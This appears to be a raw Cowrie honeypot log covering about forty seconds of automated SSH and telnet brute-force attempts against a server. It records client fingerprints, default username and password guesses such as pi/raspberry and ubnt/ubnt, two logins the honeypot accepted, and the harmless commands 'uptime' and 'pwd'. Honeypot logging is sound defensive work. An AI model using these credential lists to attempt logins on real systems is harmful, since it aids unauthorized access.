{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:02:11.683487Z","src_ip":"212.227.235.229","session":"00a4cd82f924"}
{"eventid":"cowrie.login.failed","username":"git","password":"zaqxsw","message":"login attempt [git/zaqxsw] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:12.679127Z","src_ip":"212.227.235.229","session":"00a4cd82f924"}
{"eventid":"cowrie.login.success","username":"root","password":"Safari","message":"login attempt [root/Safari] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:02:13.705692Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58610,"dst_ip":"1.2.3.4","dst_port":22,"session":"07cf3b8e10f5","protocol":"ssh","message":"New connection: 212.227.125.160:58610 (1.2.3.4:22) [session: 07cf3b8e10f5]","sensor":"my-vps","timestamp":"2025-08-31T01:02:13.823582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:13.824250Z","src_ip":"212.227.125.160","session":"07cf3b8e10f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:13.897581Z","src_ip":"212.227.125.160","session":"07cf3b8e10f5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:13.925095Z","src_ip":"212.227.235.229","session":"00a4cd82f924"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:14.119317Z","src_ip":"212.227.125.160","session":"07cf3b8e10f5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:15.248173Z","src_ip":"212.227.125.160","session":"07cf3b8e10f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:02:16.414474Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T01:02:16.415363Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37484,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e984f089d8f","protocol":"ssh","message":"New connection: 212.227.125.160:37484 (1.2.3.4:22) [session: 8e984f089d8f]","sensor":"my-vps","timestamp":"2025-08-31T01:02:17.877116Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:18.220836Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:18.222564Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:18.274632Z","src_ip":"212.227.125.160","session":"8e984f089d8f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:02:18.275420Z","src_ip":"212.227.125.160","session":"8e984f089d8f"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password1","message":"login attempt [debian/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:20.408688Z","src_ip":"212.227.125.160","session":"8e984f089d8f"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:22.161237Z","src_ip":"212.227.125.160","session":"8e984f089d8f"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":47838,"dst_ip":"1.2.3.4","dst_port":22,"session":"5542de0100a9","protocol":"ssh","message":"New connection: 201.148.180.50:47838 (1.2.3.4:22) [session: 5542de0100a9]","sensor":"my-vps","timestamp":"2025-08-31T01:02:24.058952Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39004,"dst_ip":"1.2.3.4","dst_port":22,"session":"a10cc389c587","protocol":"ssh","message":"New connection: 212.227.125.160:39004 (1.2.3.4:22) [session: a10cc389c587]","sensor":"my-vps","timestamp":"2025-08-31T01:02:24.191162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:24.192130Z","src_ip":"212.227.125.160","session":"a10cc389c587"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:24.265584Z","src_ip":"212.227.125.160","session":"a10cc389c587"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:24.489547Z","src_ip":"212.227.125.160","session":"a10cc389c587"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:25.579572Z","src_ip":"212.227.125.160","session":"a10cc389c587"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:25.698112Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:25.698859Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.login.success","username":"root","password":"Safari","message":"login attempt [root/Safari] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:02:32.898534Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36398,"dst_ip":"1.2.3.4","dst_port":22,"session":"e94cc13e6f80","protocol":"ssh","message":"New connection: 212.227.125.160:36398 (1.2.3.4:22) [session: e94cc13e6f80]","sensor":"my-vps","timestamp":"2025-08-31T01:02:34.704712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:34.705660Z","src_ip":"212.227.125.160","session":"e94cc13e6f80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:34.779643Z","src_ip":"212.227.125.160","session":"e94cc13e6f80"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:35.012594Z","src_ip":"212.227.125.160","session":"e94cc13e6f80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:02:35.902705Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T01:02:35.903641Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:36.165451Z","src_ip":"212.227.125.160","session":"e94cc13e6f80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:37.744587Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.session.closed","duration":"13.7","message":"Connection lost after 13.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:37.746017Z","src_ip":"201.148.180.50","session":"5542de0100a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52498,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f02b4330343","protocol":"ssh","message":"New connection: 212.227.125.160:52498 (1.2.3.4:22) [session: 0f02b4330343]","sensor":"my-vps","timestamp":"2025-08-31T01:02:45.145175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:45.146168Z","src_ip":"212.227.125.160","session":"0f02b4330343"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:45.220150Z","src_ip":"212.227.125.160","session":"0f02b4330343"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:45.443764Z","src_ip":"212.227.125.160","session":"0f02b4330343"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:46.585781Z","src_ip":"212.227.125.160","session":"0f02b4330343"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53168,"dst_ip":"1.2.3.4","dst_port":22,"session":"30ece89173f1","protocol":"ssh","message":"New connection: 212.227.125.160:53168 (1.2.3.4:22) [session: 30ece89173f1]","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.161922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.4p1 Raspbian-10+deb9u4","message":"Remote SSH version: SSH-2.0-OpenSSH_7.4p1 Raspbian-10+deb9u4","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.163392Z","src_ip":"212.227.125.160","session":"30ece89173f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50189,"dst_ip":"1.2.3.4","dst_port":22,"session":"8780299b2675","protocol":"ssh","message":"New connection: 212.227.125.160:50189 (1.2.3.4:22) [session: 8780299b2675]","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.176102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.4p1 Raspbian-10+deb9u4","message":"Remote SSH version: SSH-2.0-OpenSSH_7.4p1 Raspbian-10+deb9u4","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.182106Z","src_ip":"212.227.125.160","session":"8780299b2675"}
{"eventid":"cowrie.client.kex","hassh":"0df0d56bb50c6b2426d8d40234bf1826","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 0df0d56bb50c6b2426d8d40234bf1826","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.213830Z","src_ip":"212.227.125.160","session":"30ece89173f1"}
{"eventid":"cowrie.client.kex","hassh":"0df0d56bb50c6b2426d8d40234bf1826","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 0df0d56bb50c6b2426d8d40234bf1826","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.234745Z","src_ip":"212.227.125.160","session":"8780299b2675"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.712506Z","src_ip":"212.227.125.160","session":"30ece89173f1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberryraspberry993311","message":"login attempt [pi/raspberryraspberry993311] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:50.718635Z","src_ip":"212.227.125.160","session":"8780299b2675"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:51.766455Z","src_ip":"212.227.125.160","session":"30ece89173f1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:51.770634Z","src_ip":"212.227.125.160","session":"8780299b2675"}
{"eventid":"cowrie.session.connect","src_ip":"221.124.7.211","src_port":40669,"dst_ip":"1.2.3.4","dst_port":23,"session":"b07b010bc4f6","protocol":"telnet","message":"New connection: 221.124.7.211:40669 (1.2.3.4:23) [session: b07b010bc4f6]","sensor":"my-vps","timestamp":"2025-08-31T01:02:52.008514Z"}
